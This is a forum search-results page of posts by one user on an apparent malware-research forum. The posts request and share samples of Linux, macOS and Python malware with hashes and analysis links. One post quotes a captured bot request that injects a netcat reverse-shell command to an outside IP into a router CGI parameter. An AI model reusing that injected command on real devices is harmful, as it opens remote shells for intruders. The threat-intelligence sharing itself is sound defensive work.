Search found 45 matches

by K_Mikhail
Sun Aug 06, 2017 5:01 pm
Forum: Completed Malware Requests
Topic: TrojanSpy:MSIL/Lachemp.A sample request
Replies: 2
Views: 7410

Re: TrojanSpy:MSIL/Lachemp.A sample request

BTW, HEUR:Trojan.MSIL.Tpyn.chu (Kaspersky) can also be reproduced on SHA1: 2d3de82a04024b124411fb764cee44b803996a57 sample, which is EternalRocks malware family.
by K_Mikhail
Sat Jul 15, 2017 7:42 pm
Forum: Malware
Topic: Linux Unclassified Bot
Replies: 1
Views: 7846

Linux Unclassified Bot

Hello! Found on: https://detux.org/report.php?sha256=8c56e2971649d137917e0e1b45985473e68e803bd374c8a5c0b4c4decdb4751a GET /set_ftp.cgi?loginuse= &loginpas= &next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+11.11.11.111+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0 GET /ftpt...
by K_Mikhail
Thu Jul 06, 2017 4:41 pm
Forum: Malware
Topic: Linux PWS Trojan
Replies: 0
Views: 3445

Linux PWS Trojan

Hello! Found on [1] https://malwr.com/analysis/NmM4NGQ4ZWRiY2I0NDE2NjkxZTgwMWMxOTVkZWI4ZWM/ (unupx) [2] https://malwr.com/analysis/MWJmZWE5N2ZlZWFiNDExMzlmN2RhNTJmY2FkYjkwZWY/ (upx) Detection is poor: 1/56 for both of variants: https://virustotal.com/en/file/0e32b7ce2b64b9f993b7431a2b89484c8a3990fcc...
by K_Mikhail
Thu Jul 06, 2017 6:43 am
Forum: Completed Malware Requests
Topic: Python/Filecoder.R
Replies: 1
Views: 2495

Python/Filecoder.R

Hello!

I'm looking for Python/Filecoder.R sample, which was mentioned in this article: https://www.welivesecurity.com/2017/06/ ... t-ukraine/

SHA1: AF07AB5950D35424B1ECCC3DD0EEBC05AE7DDB5E

Thanks for assistance!
by K_Mikhail
Mon Jul 03, 2017 6:16 pm
Forum: Malware
Topic: OSX Kirino (BigFive) BackDoor
Replies: 2
Views: 4041

Re: OSX Kirino (BigFive) BackDoor

Mac.BackDoor.BigFive.1, Mac.BackDoor.BigFive.2, Mac.BackDoor.BigFive.3 renamed on Mac.BackDoor.Kirino.1, Mac.BackDoor.Kirino.2, Mac.BackDoor.Kirino.3.
by K_Mikhail
Mon Jul 03, 2017 10:59 am
Forum: Malware
Topic: OSX Kirino (BigFive) BackDoor
Replies: 2
Views: 4041

OSX Kirino (BigFive) BackDoor

Subj [1] https://virustotal.com/en/file/2ccd0e9df8c2411dfe60b76edb25607193bfb316acac21b7250be65c37215ca3/analysis/1499079161/ (HEUR:Exploit.OSX.CVE-2016-4625.a || Exploit.CVE-2016-4625.1 || a variant of OSX/Exploit.CVE-2016-4625.B) [2] https://virustotal.com/en/file/5b13a275c3d33465a5c323558b1bf8bbb...
by K_Mikhail
Thu Jun 29, 2017 9:03 am
Forum: Completed Malware Requests
Topic: Old osx worm "Niqtana"
Replies: 2
Views: 8569

Re: Old osx worm "Niqtana"

Hello!

http://contagiodump.blogspot.com/2012/0 ... lware.html

2007 Worm.OSX.Niqtana.a 2C25908053ECC1474D2FB2C530EA5CFA
by K_Mikhail
Thu Jun 15, 2017 1:52 pm
Forum: Malware
Topic: Possibly OS/X Ransomware (File coder)
Replies: 5
Views: 11506

Re: Possibly OS/X Ransomware (File coder)

Thanks for attaching file!

Despite on screaming alarm-string, in fact, the file has been marked as clean by Dr.Web's and KL's viruslabs.
by K_Mikhail
Tue Jun 13, 2017 7:58 am
Forum: Malware
Topic: Linux/FileCoder (Linux.Encoder)
Replies: 18
Views: 41172

Re: Linux/FileCoder (Linux.Encoder)

SHA1: d7b0255d7d98c33a30fe71543ec98d802c2a2dd7 FileCoder.O (NOD32) || Ransom:Linux/Erebus.A: https://www.virustotal.com/en/file/d889734783273b7158deeae6cf804a6be99c3a5353d94225a4dbe92caf3a3d48/analysis/ UPD: SHA1: ffebffc89a0b417e56dea3fdce962ee54f7ce00f : https://www.virustotal.com/en/file/0b7996bc...
by K_Mikhail
Mon Jun 12, 2017 8:31 pm
Forum: Malware
Topic: Possibly OS/X Ransomware (File coder)
Replies: 5
Views: 11506

Possibly OS/X Ransomware (File coder)

Hello! Possibly OS/X Ransomware (File coder). [1] https://malwr.com/analysis/MWRiOTVhZmEzMjQ2NGUxYTg1ZWRhMTJkZWY4ODg5YTc/ (Mach-O 64-bit, not downloadable); Alarm-string: "Send me this identifier together with your $$$$ to derypt your file" [2] https://virustotal.com/en/file/4c27249bced8cb185a84671f...